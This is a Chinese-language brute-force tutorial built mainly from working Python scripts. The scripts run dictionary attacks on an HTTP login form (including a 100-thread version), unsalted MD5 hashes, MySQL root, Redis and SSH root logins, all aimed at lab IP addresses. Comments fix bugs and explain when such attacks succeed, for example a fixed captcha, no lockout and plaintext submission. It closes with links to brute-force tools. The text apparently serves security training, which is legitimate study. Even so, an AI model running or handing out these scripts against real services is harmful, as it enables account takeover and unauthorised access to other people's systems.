暴力破解案例
暴力破解
1 概述
暴力破解,是一种针对密码的破译方法,将候选密码逐个提交(实际中多为基于字典的穷举),直到找出真正的密码为止。其成功率取决于字典质量,其速度取决于目标是否有限流、验证码或账号锁定等防护。
2 爆破HTTP协议
第一步:实验性发送请求成功
import requests
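# Step 1: a single trial request, to confirm the login endpoint answers and
# that a failed login is recognisable by the literal body "login-fail".
url = "http://192.172.0.100:8080/woniusales/user/login"
data = {"username": "admin", "password": "123456", "verifycode": "0000"}
# timeout: a hung server must not stall the script forever
result = requests.post(url=url, data=data, timeout=10)
# Bug fix: the original f-string referenced an undefined name `password` and
# raised NameError exactly when the login succeeded.  Note the oracle is weak:
# any non-"login-fail" body (error page, rate-limit response) also matches.
if result.text != "login-fail":
    print(f"疑是破解成功,密码是:{data['password']}")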
第二步:已知用户名,未知密码破解
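import requests


def pojie_http(password):
    """Try one password for the fixed username "admin".

    Posts the credential to the lab login endpoint and treats any response
    body other than the literal "login-fail" as a hit (an error page or a
    rate-limit response would also count, so confirm hits manually).
    Prints the password and exits the process on a hit.

    Args:
        password: candidate password to submit.
    """
    url = "http://192.172.0.100:8080/woniusales/user/login"
    # Bug fix: the original wrote `admin` unquoted -> NameError on first call.
    data = {"username": "admin", "password": password, "verifycode": "0000"}
    # timeout so a hung server cannot stall the whole wordlist run
    result = requests.post(url=url, data=data, timeout=10)
    if result.text != "login-fail":
        print(f"疑是破解成功,密码是:{password}")
        exit()


with open(file="password.txt") as f:
    passwordlist = f.readlines()

for passwd in passwordlist:
    passwd = passwd.strip()
    pojie_http(passwd)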
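# Step 3: username and password both unknown -- try every username/password pair.
import requests


def pojie_http(username, password):
    """Try one username/password pair against the lab login endpoint.

    Any response body other than the literal "login-fail" is treated as a
    hit (an error page or rate-limit response would also match, so confirm
    hits manually).  Prints the pair and exits the process on a hit.

    Args:
        username: candidate account name.
        password: candidate password.
    """
    url = "http://192.172.0.100:8080/woniusales/user/login"
    data = {"username": username, "password": password, "verifycode": "0000"}
    # timeout so a hung server cannot stall the whole wordlist run
    result = requests.post(url=url, data=data, timeout=10)
    if result.text != "login-fail":
        # Report the username too: when many accounts are tried, a password
        # alone does not identify which account was opened.
        print(f"疑是破解成功,用户名是{username},密码是:{password}")
        exit()


with open(file="password.txt") as f:
    passwordlist = f.readlines()
with open(file="username.txt") as f:
    usernamelist = f.readlines()

for user in usernamelist:
    user = user.strip()
    for passwd in passwordlist:
        passwd = passwd.strip()
        pojie_http(user, passwd)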
注意:
1.暴力破解不是100%能破解成功,取决于你是否有强大的字典
2.并不是所有的 HTTP 登录接口都可以暴力破解,只有同时满足下面几个条件时才可行:
2.1 验证码很简单或可以绕过(本例中 verifycode 固定填 0000)
2.2 服务端没有错误次数限制(不锁定账号、不限流、不封 IP)
2.3 密码明文提交,未在前端加密或加签(否则字典需要先做同样的变换再提交)
3 多线程破解
一个用户作为一个线程爆破
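# One thread per username; each thread walks the whole password list for its
# user.  Step 3's pojie_http takes (username, password), so the original
# args=(user,) would have raised TypeError -- wrap the per-user loop instead.
# Caveat: exit() inside a worker raises SystemExit in that thread only; the
# remaining threads keep running (see the Event-based stop in section 4).
def _crack_user(user):
    """Try every password in passwordlist for a single username."""
    for passwd in passwordlist:
        pojie_http(user, passwd.strip())


for user in usernamelist:
    obj = threading.Thread(target=_crack_user, args=(user.strip(),))
    obj.start()
# 1. Bounded by the local machine: roughly 1300 threads at most.
# 2. Bounded by the target server's maximum throughput.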
4 多线程分配任务破解
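import threading
import requests

# Set once any worker finds a valid credential.  The original called exit()
# inside the worker, but SystemExit raised in a thread only ends that thread;
# the other 99 would keep hammering the server.  Workers poll this flag instead.
found = threading.Event()


def pojie_http(startindex, endindex):
    """Try every password for the usernames in usernamelist[startindex:endindex].

    Reads the module globals usernamelist / passwordlist (filled in under
    __main__ below).  Any response body other than the literal "login-fail"
    is treated as a hit (error pages and rate-limit responses also match, so
    confirm hits manually).  Returns early once `found` is set.

    Args:
        startindex: first index into usernamelist (inclusive).
        endindex: last index into usernamelist (exclusive).
    """
    url = "http://192.172.0.100:8080/woniusales/user/login"
    for user in usernamelist[startindex:endindex]:
        user = user.strip()
        for passwd in passwordlist:
            if found.is_set():
                return
            passwd = passwd.strip()
            data = {"username": user, "password": passwd, "verifycode": "0000"}
            # timeout so one hung request cannot stall this worker forever
            result = requests.post(url=url, data=data, timeout=10)
            if result.text != "login-fail":
                print(f"疑是破解成功,用户名是{user},密码是:{passwd}")
                found.set()
                return


if __name__ == '__main__':
    with open(file="username.txt") as f:
        usernamelist = f.readlines()
    with open(file="password.txt") as f:
        passwordlist = f.readlines()
    # Split the work: 100 threads x 20 usernames each (slices 0-20, 20-40,
    # ... 1980-2000); adjust the thread count to what the server tolerates.
    threads = []
    for index in range(100):
        start = 20 * index
        end = 20 * (index + 1)
        obj = threading.Thread(target=pojie_http, args=(start, end))
        obj.start()
        threads.append(obj)
    # Wait for the workers so the process does not return before they finish.
    for obj in threads:
        obj.join()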
5 MD5爆破
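"""MD5 is a one-way hash: it cannot be decrypted, only matched by hashing
candidates from a wordlist and comparing digests.  This only works for
unsalted digests -- a salted hash needs the salt folded into the candidate."""
import hashlib


def pojie_md5(source, target, algorithm="md5"):
    """Hash one candidate and report whether it matches the target digest.

    Args:
        source: candidate plaintext.
        target: hex digest to match; compared case-insensitively, so both
            "E10ADC..." and "e10adc..." work.
        algorithm: any hashlib algorithm name ("md5", "sha1", "sha256", ...);
            defaults to MD5 as in the original.

    Returns:
        True on a match (the candidate is also printed), False otherwise.
        The original called exit() here; the caller now stops the loop.
    """
    h_digest = hashlib.new(algorithm, source.encode()).hexdigest()
    print(h_digest)
    if h_digest == target.lower():
        print(f"怀疑是破解成功:{source}")
        return True
    return False


if __name__ == '__main__':
    target = "e10adc3949ba59abbe56e057f20f883e"
    with open(file="password.txt") as f:
        data_list = f.readlines()
    for i in data_list:
        i = i.strip()
        if pojie_md5(source=i, target=target):
            break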
6 MySQL爆破
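import pymysql


def pojie_mysql(passwd):
    """Try one password for root@192.172.0.100:3306.

    A rejected password raises pymysql OperationalError 1045 (access denied)
    and is silently skipped.  Any other OperationalError (e.g. 2003, host
    unreachable) is re-raised: the original bare except swallowed it, so a
    dead target looked exactly like "no password in the wordlist".
    On success the connection is closed, the password printed, and the
    process exits.

    Args:
        passwd: candidate password.
    """
    try:
        conn = pymysql.connect(user="root", password=passwd, port=3306,
                               host="192.172.0.100", connect_timeout=5)
    except pymysql.err.OperationalError as err:
        if err.args[0] != 1045:
            raise  # not an auth failure -- surface it instead of hiding it
        # 1045 = access denied for this password; move on
    else:
        conn.close()  # release the server-side session before reporting
        print(f"疑是破解成功:{passwd}")
        exit()


if __name__ == '__main__':
    with open(file="password.txt") as f:
        data_list = f.readlines()
    for passwd in data_list:
        pojie_mysql(passwd.strip())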
7 Redis爆破
import redis
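def pojie_redis(passwd):
    """Try one password against Redis at 192.172.0.101 (db 0).

    A rejected password raises redis AuthenticationError and is skipped.
    Other errors (host unreachable, timeout) now propagate -- the original
    bare except swallowed them, so a dead target looked like "no password in
    the wordlist".  On success the password is printed and the process exits.

    NOTE(review): a server with *no* password configured also answers AUTH
    with an error, so every candidate would be reported as wrong; try an
    unauthenticated PING first to rule that case out.

    Args:
        passwd: candidate password.
    """
    redis_obj = redis.Redis(host="192.172.0.101", password=passwd, db=0,
                            socket_connect_timeout=5, socket_timeout=5)
    try:
        redis_obj.ping()
    except redis.exceptions.AuthenticationError:
        return  # wrong password -- the only failure that is silently skipped
    finally:
        redis_obj.close()  # drop the connection whether or not AUTH succeeded
    print(f"密码是{passwd}")
    exit()


if __name__ == '__main__':
    with open(file="password.txt") as f:
        data_list = f.readlines()
    for passwd in data_list:
        pojie_redis(passwd.strip())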
8 SSH爆破
import paramiko
from paramiko.client import AutoAddPolicy
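def pojie_ssh(passwd):
    """Try one password for root@192.172.0.100 over SSH.

    AutoAddPolicy accepts whatever host key the server presents.  That is
    acceptable in a lab, but it means a man-in-the-middle would receive every
    candidate password; outside a lab pin the host key (load_host_keys /
    RejectPolicy).  Agent and ~/.ssh key lookup are disabled so a login that
    succeeds is due to the password, not to the operator's own key.

    A rejected password raises paramiko AuthenticationException and is
    skipped.  Other errors (host unreachable, banner/protocol failure) now
    propagate -- the original bare except swallowed them, so a dead target
    looked like "no password in the wordlist".  On success the password is
    printed and the process exits.

    Args:
        passwd: candidate password.
    """
    ssh = paramiko.SSHClient()
    ssh.set_missing_host_key_policy(AutoAddPolicy())
    try:
        ssh.connect(hostname="192.172.0.100", username="root", password=passwd,
                    timeout=10, allow_agent=False, look_for_keys=False)
    except paramiko.AuthenticationException:
        return  # wrong password -- the only failure that is silently skipped
    finally:
        ssh.close()  # close the transport whether or not auth succeeded
    print(f"密码是{passwd}")
    exit()


if __name__ == '__main__':
    with open(file="password.txt") as f:
        data_list = f.readlines()
    for passwd in data_list:
        pojie_ssh(passwd.strip())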
9 爆破工具
https://blog.csdn.net/m0_59598029/article/details/133217000
https://blog.51cto.com/u_16213303/10539031
https://www.zhihu.com/tardis/bd/art/558677293?source_id=1001